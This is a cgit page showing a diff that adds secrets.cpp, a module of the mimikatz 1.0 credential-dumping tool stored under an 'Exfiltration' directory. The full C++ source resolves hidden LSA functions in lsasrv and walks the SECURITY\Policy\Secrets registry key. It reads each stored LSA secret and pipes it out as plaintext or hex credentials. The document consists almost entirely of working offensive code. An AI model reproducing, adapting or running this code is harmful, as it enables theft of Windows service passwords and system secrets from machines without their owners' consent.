aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp
diff options
context:
space:
mode:
Diffstat (limited to 'Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp')
-rw-r--r--Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp99
1 files changed, 99 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp
new file mode 100644
index 0000000..06d8664
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp
@@ -0,0 +1,99 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+ Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "secrets.h"
+
+PLSA_I_OPEN_POLICY_TRUSTED LsaIOpenPolicyTrusted = NULL;
+PLSA_R_OPEN_SECRET LsarOpenSecret = NULL;
+PLSA_R_QUERY_SECRET LsarQuerySecret = NULL;
+PLSA_R_CLOSE LsarClose = NULL;
+
+bool searchSECFuncs()
+{
+ if(!(LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose))
+ {
+ if(HMODULE hLsasrv = GetModuleHandle(L"lsasrv"))
+ {
+ LsaIOpenPolicyTrusted = reinterpret_cast<PLSA_I_OPEN_POLICY_TRUSTED>(GetProcAddress(hLsasrv, "LsaIOpenPolicyTrusted"));
+ LsarOpenSecret = reinterpret_cast<PLSA_R_OPEN_SECRET>(GetProcAddress(hLsasrv, "LsarOpenSecret"));
+ LsarQuerySecret = reinterpret_cast<PLSA_R_QUERY_SECRET>(GetProcAddress(hLsasrv, "LsarQuerySecret"));
+ LsarClose = reinterpret_cast<PLSA_R_CLOSE>(GetProcAddress(hLsasrv, "LsarClose"));
+ }
+ return (LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose);
+ }
+ else return true;
+}
+
+__kextdll bool __cdecl getSECFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+ wostringstream monStream;
+ monStream << L"** lsasrv.dll ** ; Statut recherche : " << (searchSECFuncs() ? L"OK :)" : L"KO :(") << endl << endl <<
+ L"@LsaIOpenPolicyTrusted = " << LsaIOpenPolicyTrusted << endl <<
+ L"@LsarOpenSecret = " << LsarOpenSecret << endl <<
+ L"@LsarQuerySecret = " << LsarQuerySecret << endl <<
+ L"@LsarClose = " << LsarClose << endl;
+ return sendTo(monPipe, monStream.str());
+}
+
+__kextdll bool __cdecl getSecrets(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+ if(searchSECFuncs())
+ {
+ bool sendOk = true;
+ wstring message;
+ LSA_HANDLE hPolicy;
+
+ if(NT_SUCCESS(LsaIOpenPolicyTrusted(&hPolicy)))
+ {
+ HKEY hKeysSecrets;
+ if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SECURITY\\Policy\\Secrets", 0, KEY_READ, &hKeysSecrets) == ERROR_SUCCESS)
+ {
+ DWORD nbKey, maxKeySize;
+ if(RegQueryInfoKey(hKeysSecrets, NULL, NULL, NULL, &nbKey, &maxKeySize, NULL, NULL, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
+ {
+ for(DWORD i = 0; (i < nbKey) && sendOk; i++)
+ {
+ DWORD buffsize = (maxKeySize+1) * sizeof(wchar_t);
+ LSA_UNICODE_STRING monNomSecret = {0, 0, new wchar_t[buffsize]};
+
+ if(RegEnumKeyEx(hKeysSecrets, i, monNomSecret.Buffer, &buffsize, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
+ {
+ monNomSecret.Length = monNomSecret.MaximumLength = static_cast<USHORT>(buffsize * sizeof(wchar_t));
+ message.assign(L"\nSecret : "); message.append(mod_text::stringOfSTRING(monNomSecret)); message.push_back(L'\n');
+
+ LSA_HANDLE hSecret;
+ if(NT_SUCCESS(LsarOpenSecret(hPolicy, &monNomSecret, SECRET_QUERY_VALUE, &hSecret)))
+ {
+ LSA_SECRET * monSecret = NULL;
+ if(NT_SUCCESS(LsarQuerySecret(hSecret, &monSecret, NULL, NULL, NULL)))
+ {
+ message.append(L"Credential : "); message.append(mod_text::stringOrHex(reinterpret_cast<PBYTE>(monSecret->Buffer), monSecret->Length)); message.push_back(L'\n');
+ LsaFreeMemory(monSecret);
+ }
+ else message.append(L"Erreur : Impossible de récupérer le secret\n");
+ LsarClose(&hSecret);
+ }
+ else message.append(L"Erreur : Impossible d\'ouvrir le secret\n");
+ }
+ delete[] monNomSecret.Buffer;
+ sendOk = sendTo(monPipe, message);
+ }
+ message.clear();
+ } else message.assign(L"Erreur : Impossible d\'obtenir des information sur le registre secret\n");
+ RegCloseKey(hKeysSecrets);
+ }
+ else message.assign(L"Erreur : Impossible d\'ouvrir la clé Secrets\n");
+ LsarClose(&hPolicy);
+ }
+ else message.assign(L"Erreur : Impossible d\'ouvrir la politique\n");
+
+ if(!message.empty())
+ sendOk = sendTo(monPipe, message);
+
+ return sendOk;
+ }
+ else return getSECFunctions(monPipe, mesArguments);
+}
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-27 22:14:33 +0000